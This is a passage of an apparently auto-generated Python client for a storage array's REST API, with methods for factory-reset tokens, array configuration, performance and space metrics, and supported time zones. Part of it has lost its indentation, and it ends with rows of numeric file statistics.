params['sort'] = [str(_x) for _x in params['sort']]
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/factory-reset-token', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_factory_reset_token_get_with_http_info(
self,
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayFactoryResetTokenGetResponse
"""List factory reset tokens
Displays a list of tokens used to perform a factory reset on the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_factory_reset_token_get_with_http_info(async_req=True)
>>> result = thread.get()
:param str continuation_token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param str filter: Exclude resources that don't match the specified criteria.
:param int limit: Limit the size of the response to the specified number of resources. A `limit` of `0` can be used to get the number of resources without getting all of the resources. It will be returned in the `total_item_count` field. If a client asks for a page size larger than the maximum number, the request is still valid. In that case the server just returns the maximum number of items, disregarding the client's page size request.
:param int offset: The offset of the first resource to return from a collection.
:param list[str] sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name). NOTE: If you provide a sort you will not get a `continuation_token` in the response.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayFactoryResetTokenGetResponse
If the method is called asynchronously,
returns the request thread.
"""
if sort is not None:
if not isinstance(sort, list):
sort = [sort]
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'limit' in params and params['limit'] < 1:
raise ValueError("Invalid value for parameter `limit` when calling `api21_arrays_factory_reset_token_get`, must be a value greater than or equal to `1`")
if 'offset' in params and params['offset'] < 0:
raise ValueError("Invalid value for parameter `offset` when calling `api21_arrays_factory_reset_token_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'continuation_token' in params:
query_params.append(('continuation_token', params['continuation_token']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'offset' in params:
query_params.append(('offset', params['offset']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
collection_formats['sort'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/factory-reset-token', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayFactoryResetTokenGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_factory_reset_token_post_with_http_info(
self,
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayFactoryResetTokenResponse
"""Create a factory reset token
Creates a token that can be used to perform a factory reset on the array. Factory reset tokens can only be created after the array has been prepared for reset (e.g., all file systems, buckets, and snapshots must first be eradicated). After a token has been created, operations that would take the array out of the prepared state (e.g., creating file systems) are disabled until all tokens have been deleted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_factory_reset_token_post_with_http_info(async_req=True)
>>> result = thread.get()
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayFactoryResetTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/factory-reset-token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayFactoryResetTokenResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_get_with_http_info(
self,
continuation_token=None, # type: str
filter=None, # type: str
limit=None, # type: int
offset=None, # type: int
sort=None, # type: List[str]
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayGetResponse
"""GET arrays
List array attributes such as the array name, ID, version, and NTP servers.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_get_with_http_info(async_req=True)
>>> result = thread.get()
:param str continuation_token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param str filter: Exclude resources that don't match the specified criteria.
:param int limit: Limit the size of the response to the specified number of resources. A `limit` of `0` can be used to get the number of resources without getting all of the resources. It will be returned in the `total_item_count` field. If a client asks for a page size larger than the maximum number, the request is still valid. In that case the server just returns the maximum number of items, disregarding the client's page size request.
:param int offset: The offset of the first resource to return from a collection.
:param list[str] sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name). NOTE: If you provide a sort you will not get a `continuation_token` in the response.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayGetResponse
If the method is called asynchronously,
returns the request thread.
"""
if sort is not None:
if not isinstance(sort, list):
sort = [sort]
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'limit' in params and params['limit'] < 1:
raise ValueError("Invalid value for parameter `limit` when calling `api21_arrays_get`, must be a value greater than or equal to `1`")
if 'offset' in params and params['offset'] < 0:
raise ValueError("Invalid value for parameter `offset` when calling `api21_arrays_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'continuation_token' in params:
query_params.append(('continuation_token', params['continuation_token']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'offset' in params:
query_params.append(('offset', params['offset']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
collection_formats['sort'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_http_specific_performance_get_with_http_info(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayHttpSpecificPerformanceGet
"""GET arrays/http-specific-performance
List the HTTP performance metrics of the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_http_specific_performance_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayHttpSpecificPerformanceGet
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_http_specific_performance_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_http_specific_performance_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_http_specific_performance_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/http-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayHttpSpecificPerformanceGet',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_nfs_specific_performance_get_with_http_info(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayNfsSpecificPerformanceGet
"""GET arrays/nfs-specific-performance
List the NFS performance metrics of the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_nfs_specific_performance_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayNfsSpecificPerformanceGet
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_nfs_specific_performance_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_nfs_specific_performance_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_nfs_specific_performance_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/nfs-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayNfsSpecificPerformanceGet',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_patch_with_http_info(
self,
array=None, # type: list
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayResponse
"""PATCH arrays
Modify the general configuration of the array including banner text, array name, NTP servers, and time zone.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_patch_with_http_info(array, async_req=True)
>>> result = thread.get()
:param Array array: (required)
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'array' is set
if array is None:
raise TypeError("Missing the required parameter `array` when calling `api21_arrays_patch`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'array' in params:
body_params = params['array']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_performance_get_with_http_info(
self,
end_time=None, # type: int
protocol=None, # type: str
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayPerformanceGetResponse
"""GET arrays/performance
Lists the overall performance metrics of the array.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api21_arrays_performance_get_with_http_info(async_req=True)
>>> result = thread.get()
:param int end_time: When the time window ends (in milliseconds since epoch).
:param str protocol: Display the performance of a specified protocol. Valid values are `all`, `HTTP`, `SMB`, `NFS`, and `S3`. If not specified, defaults to `all`, which will provide the combined performance of all available protocols.
:param int resolution: The desired ms between samples. Available resolutions may depend on data type, `start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`, `7200000`, and `86400000` are possible values.
:param int start_time: When the time window starts (in milliseconds since epoch).
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: ArrayPerformanceGetResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
if 'end_time' in params and params['end_time'] < 0:
raise ValueError("Invalid value for parameter `end_time` when calling `api21_arrays_performance_get`, must be a value greater than or equal to `0`")
if 'resolution' in params and params['resolution'] < 0:
raise ValueError("Invalid value for parameter `resolution` when calling `api21_arrays_performance_get`, must be a value greater than or equal to `0`")
if 'start_time' in params and params['start_time'] < 0:
raise ValueError("Invalid value for parameter `start_time` when calling `api21_arrays_performance_get`, must be a value greater than or equal to `0`")
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'protocol' in params:
query_params.append(('protocol', params['protocol']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = ['AuthorizationHeader']
return self.api_client.call_api(
'/api/2.1/arrays/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceGetResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api21_arrays_performance_replication_get_with_http_info(
    self,
    end_time=None,  # type: int
    resolution=None,  # type: int
    start_time=None,  # type: int
    type=None,  # type: str
    async_req=False,  # type: bool
    _return_http_data_only=False,  # type: bool
    _preload_content=True,  # type: bool
    _request_timeout=None,  # type: Optional[int]
):
    # type: (...) -> models.ArrayPerformanceReplicationGetResp
    """GET arrays/performance/replication

    List replication performance metrics.

    Synchronous by default; pass ``async_req=True`` to run the request in a
    separate thread and receive a ``multiprocessing.pool.ApplyResult``.

    :param int end_time: End of the time window, in milliseconds since epoch.
    :param int resolution: Desired milliseconds between samples. Typical
        values are `1000`, `30000`, `300000`, `1800000`, `7200000`, and
        `86400000`; availability may depend on data type and window.
    :param int start_time: Start of the time window, in milliseconds since epoch.
    :param str type: Object type to report: `all`, `file-system`, or
        `object-store`. Defaults to `all` when omitted.
    :param bool async_req: Run the request in a separate thread.
    :param bool _return_http_data_only: Return only the data field.
    :param bool _preload_content: Deserialize the response into objects.
    :param int _request_timeout: Total timeout in seconds, or a
        (connect, read) tuple.
    :return: ArrayPerformanceReplicationGetResp, or the request thread when
        called asynchronously.
    """
    # Capture caller-supplied arguments; must happen before any other local
    # is bound so only the parameters end up in `params`.
    params = {k: v for k, v in six.iteritems(locals()) if v is not None}
    # Normalize filter/sort arguments to strings (vestigial here, kept for
    # parity with the other endpoints).
    if params.get('filter'):
        params['filter'] = str(params['filter'])
    if params.get('sort'):
        params['sort'] = [str(item) for item in params['sort']]
    # Reject negative window/resolution values up front.
    for key in ('end_time', 'resolution', 'start_time'):
        if key in params and params[key] < 0:
            raise ValueError(
                "Invalid value for parameter `{}` when calling "
                "`api21_arrays_performance_replication_get`, must be a value "
                "greater than or equal to `0`".format(key)
            )
    collection_formats = {}
    path_params = {}
    query_params = [
        (key, params[key])
        for key in ('end_time', 'resolution', 'start_time', 'type')
        if key in params
    ]
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }
    form_params = []
    local_var_files = {}
    body_params = None
    auth_settings = ['AuthorizationHeader']
    return self.api_client.call_api(
        '/api/2.1/arrays/performance/replication', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ArrayPerformanceReplicationGetResp',
        auth_settings=auth_settings,
        async_req=async_req,
        _return_http_data_only=_return_http_data_only,
        _preload_content=_preload_content,
        _request_timeout=_request_timeout,
        collection_formats=collection_formats,
    )
def api21_arrays_s3_specific_performance_get_with_http_info(
    self,
    end_time=None,  # type: int
    resolution=None,  # type: int
    start_time=None,  # type: int
    async_req=False,  # type: bool
    _return_http_data_only=False,  # type: bool
    _preload_content=True,  # type: bool
    _request_timeout=None,  # type: Optional[int]
):
    # type: (...) -> models.ArrayS3SpecificPerformanceGetResp
    """GET arrays/s3-specific-performance

    List the S3 performance metrics of the array.

    Synchronous by default; pass ``async_req=True`` to run the request in a
    separate thread and receive a ``multiprocessing.pool.ApplyResult``.

    :param int end_time: End of the time window, in milliseconds since epoch.
    :param int resolution: Desired milliseconds between samples. Typical
        values are `1000`, `30000`, `300000`, `1800000`, `7200000`, and
        `86400000`; availability may depend on data type and window.
    :param int start_time: Start of the time window, in milliseconds since epoch.
    :param bool async_req: Run the request in a separate thread.
    :param bool _return_http_data_only: Return only the data field.
    :param bool _preload_content: Deserialize the response into objects.
    :param int _request_timeout: Total timeout in seconds, or a
        (connect, read) tuple.
    :return: ArrayS3SpecificPerformanceGetResp, or the request thread when
        called asynchronously.
    """
    # Capture caller-supplied arguments; must happen before any other local
    # is bound so only the parameters end up in `params`.
    params = {k: v for k, v in six.iteritems(locals()) if v is not None}
    # Normalize filter/sort arguments to strings (vestigial here, kept for
    # parity with the other endpoints).
    if params.get('filter'):
        params['filter'] = str(params['filter'])
    if params.get('sort'):
        params['sort'] = [str(item) for item in params['sort']]
    # Reject negative window/resolution values up front.
    for key in ('end_time', 'resolution', 'start_time'):
        if key in params and params[key] < 0:
            raise ValueError(
                "Invalid value for parameter `{}` when calling "
                "`api21_arrays_s3_specific_performance_get`, must be a value "
                "greater than or equal to `0`".format(key)
            )
    collection_formats = {}
    path_params = {}
    query_params = [
        (key, params[key])
        for key in ('end_time', 'resolution', 'start_time')
        if key in params
    ]
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }
    form_params = []
    local_var_files = {}
    body_params = None
    auth_settings = ['AuthorizationHeader']
    return self.api_client.call_api(
        '/api/2.1/arrays/s3-specific-performance', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ArrayS3SpecificPerformanceGetResp',
        auth_settings=auth_settings,
        async_req=async_req,
        _return_http_data_only=_return_http_data_only,
        _preload_content=_preload_content,
        _request_timeout=_request_timeout,
        collection_formats=collection_formats,
    )
def api21_arrays_space_get_with_http_info(
    self,
    end_time=None,  # type: int
    resolution=None,  # type: int
    start_time=None,  # type: int
    type=None,  # type: str
    async_req=False,  # type: bool
    _return_http_data_only=False,  # type: bool
    _preload_content=True,  # type: bool
    _request_timeout=None,  # type: Optional[int]
):
    # type: (...) -> models.ArraySpaceGetResponse
    """GET arrays/space

    List available and used storage space on the array.

    Synchronous by default; pass ``async_req=True`` to run the request in a
    separate thread and receive a ``multiprocessing.pool.ApplyResult``.

    :param int end_time: End of the time window, in milliseconds since epoch.
    :param int resolution: Desired milliseconds between samples. Typical
        values are `1000`, `30000`, `300000`, `1800000`, `7200000`, and
        `86400000`; availability may depend on data type and window.
    :param int start_time: Start of the time window, in milliseconds since epoch.
    :param str type: Object type to report: `array`, `file-system`, or
        `object-store`. Defaults to `array` when omitted.
    :param bool async_req: Run the request in a separate thread.
    :param bool _return_http_data_only: Return only the data field.
    :param bool _preload_content: Deserialize the response into objects.
    :param int _request_timeout: Total timeout in seconds, or a
        (connect, read) tuple.
    :return: ArraySpaceGetResponse, or the request thread when called
        asynchronously.
    """
    # Capture caller-supplied arguments; must happen before any other local
    # is bound so only the parameters end up in `params`.
    params = {k: v for k, v in six.iteritems(locals()) if v is not None}
    # Normalize filter/sort arguments to strings (vestigial here, kept for
    # parity with the other endpoints).
    if params.get('filter'):
        params['filter'] = str(params['filter'])
    if params.get('sort'):
        params['sort'] = [str(item) for item in params['sort']]
    # Reject negative window/resolution values up front.
    for key in ('end_time', 'resolution', 'start_time'):
        if key in params and params[key] < 0:
            raise ValueError(
                "Invalid value for parameter `{}` when calling "
                "`api21_arrays_space_get`, must be a value "
                "greater than or equal to `0`".format(key)
            )
    collection_formats = {}
    path_params = {}
    query_params = [
        (key, params[key])
        for key in ('end_time', 'resolution', 'start_time', 'type')
        if key in params
    ]
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }
    form_params = []
    local_var_files = {}
    body_params = None
    auth_settings = ['AuthorizationHeader']
    return self.api_client.call_api(
        '/api/2.1/arrays/space', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ArraySpaceGetResponse',
        auth_settings=auth_settings,
        async_req=async_req,
        _return_http_data_only=_return_http_data_only,
        _preload_content=_preload_content,
        _request_timeout=_request_timeout,
        collection_formats=collection_formats,
    )
def api21_arrays_supported_time_zones_get_with_http_info(
    self,
    continuation_token=None,  # type: str
    filter=None,  # type: str
    limit=None,  # type: int
    names=None,  # type: List[str]
    offset=None,  # type: int
    sort=None,  # type: List[str]
    async_req=False,  # type: bool
    _return_http_data_only=False,  # type: bool
    _preload_content=True,  # type: bool
    _request_timeout=None,  # type: Optional[int]
):
    # type: (...) -> models.ArraysSupportedTimeZonesGetResponse
    """GET arrays/supported-time-zones

    List supported time zones for the array.

    Synchronous by default; pass ``async_req=True`` to run the request in a
    separate thread and receive a ``multiprocessing.pool.ApplyResult``.

    :param str continuation_token: Opaque pagination token; the token for the
        next request is returned in the `continuation_token` field of the result.
    :param str filter: Exclude resources that don't match the specified criteria.
    :param int limit: Maximum number of resources to return. A `limit` of `0`
        returns only `total_item_count`. Oversized page requests are capped
        at the server maximum rather than rejected.
    :param list[str] names: Comma-separated resource names; an error is
        returned unless every element matches at least one resource.
    :param int offset: Offset of the first resource returned.
    :param list[str] sort: Fields to sort by (descending when '-' is appended).
        NOTE: supplying a sort suppresses `continuation_token` in the response.
    :param bool async_req: Run the request in a separate thread.
    :param bool _return_http_data_only: Return only the data field.
    :param bool _preload_content: Deserialize the response into objects.
    :param int _request_timeout: Total timeout in seconds, or a
        (connect, read) tuple.
    :return: ArraysSupportedTimeZonesGetResponse, or the request thread when
        called asynchronously.
    """
    # Accept scalar values for list-typed parameters.
    if names is not None and not isinstance(names, list):
        names = [names]
    if sort is not None and not isinstance(sort, list):
        sort = [sort]
    # Capture caller-supplied arguments; must happen before any other local
    # is bound so only the parameters end up in `params`.
    params = {k: v for k, v in six.iteritems(locals()) if v is not None}
    # Normalize filter/sort arguments to strings.
    if params.get('filter'):
        params['filter'] = str(params['filter'])
    if params.get('sort'):
        params['sort'] = [str(item) for item in params['sort']]
    # Range-check the pagination parameters.
    for key, minimum in (('limit', 1), ('offset', 0)):
        if key in params and params[key] < minimum:
            raise ValueError(
                "Invalid value for parameter `{}` when calling "
                "`api21_arrays_supported_time_zones_get`, must be a value "
                "greater than or equal to `{}`".format(key, minimum)
            )
    collection_formats = {}
    path_params = {}
    query_params = []
    for key in ('continuation_token', 'filter', 'limit', 'names', 'offset', 'sort'):
        if key in params:
            query_params.append((key, params[key]))
            if key in ('names', 'sort'):
                # List-valued parameters are serialized comma-separated.
                collection_formats[key] = 'csv'
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }
    form_params = []
    local_var_files = {}
    body_params = None
    auth_settings = ['AuthorizationHeader']
    return self.api_client.call_api(
        '/api/2.1/arrays/supported-time-zones', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ArraysSupportedTimeZonesGetResponse',
        auth_settings=auth_settings,
        async_req=async_req,
        _return_http_data_only=_return_http_data_only,
        _preload_content=_preload_content,
        _request_timeout=_request_timeout,
        collection_formats=collection_formats,
    )
| 46.336434
| 449
| 0.641132
| 7,310
| 59,774
| 5.033105
| 0.047059
| 0.018265
| 0.032344
| 0.027397
| 0.919357
| 0.914764
| 0.912291
| 0.908839
| 0.905686
| 0.903675
| 0
| 0.010047
| 0.272326
| 59,774
| 1,289
| 450
| 46.372382
| 0.835824
| 0.375297
| 0
| 0.858247
| 0
| 0.033505
| 0.207992
| 0.044
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01933
| false
| 0
| 0.006443
| 0
| 0.045103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
